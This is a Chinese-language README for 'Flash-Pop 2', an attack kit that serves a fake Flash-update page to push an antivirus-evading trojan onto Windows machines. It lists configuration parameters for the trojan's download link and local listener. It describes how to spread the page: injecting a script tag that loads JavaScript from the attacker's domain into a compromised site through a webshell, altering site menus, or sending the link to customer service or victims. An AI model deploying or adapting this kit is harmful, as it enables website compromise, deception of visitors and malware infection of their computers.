Flash-Pop升级版
- flash页面能够判断当前系统是否已被安装flash马
- flash页面能够判断当前系统是否是Windows,若不是则跳转到正常或指定页面
- flash安装完成后需能跳转到正常或指定页面
- flash马能够起一个本地服务
- flash马能够免杀
- flash马能够捆绑或释放正常flash安装文件
详见Zer0ne安全研究公众号
-
下载flash-pop2项目后,进入js文件夹下修改flash.js文件中的参数
-
配置说明
- ttarget: 宝塔网站设置的域名
- target_file: flash马的下载地址
- bc_link: 要跳转到的指定页面
- pb_word: 如上图
- l_url: flash马在本地监听的http服务
- l_res: flash马在本地监听的http服务返回的响应
- a_type: 应用场景
-
flash马
- flash马中应该起一个http服务,并返回设置的l_res内容
- flash马中的http服务应该返回一个用于解决跨域问题的响应头 Access-Control-Allow-Origin: *
- 示例如下:
-
已有webshell,可以修改网站源代码,检测是否已安装
- 修改网站源码,添加
<script src=https://flash-pop2-domain.com/js/flash.js></script>
- 修改网站源码,添加
-
没有webshell,可以修改网站菜单
- 添加或修改菜单链接为https://flash-pop2-domain.com/index.html
-
直接发送给客服或者受害者
-
已有webshell,可以修改网站源代码,不检测是否已安装
- 修改网站源码,添加
<script src=https://flash-pop2-domain.com/js/flash.js></script>
- 修改网站源码,添加
-
【0】已有webshell,可以修改源码,检测是否已安装flash,
- 在目标网站的页面源码中直接插入js:已安装flash的情况下,不做任何操作;未安装flash,弹出flash页面,定时检测,安装完成后,页面刷新 [0]
-
【1】没有webshell,可以修改目标网站的导航菜单:
- 添加自己的flash页面,供受害者点击;
- 如果设置了特定页面,则当安装完成后,则跳转到指定页面;
- 若未设置,则跳转到document.referrer(如果其不包含js中设置的域名)[1]
-
【2】直接发送给对方
- 对方直接在浏览器中输入flash地址:如果安装完成后,则直接跳转到指定页面;[2]
-
【3】已有webshell,可以修改源码,不检测是否已安装flash
- 在目标网站的页面源码中直接插入js:弹出flash页面,不检测是否已安装flash. [3]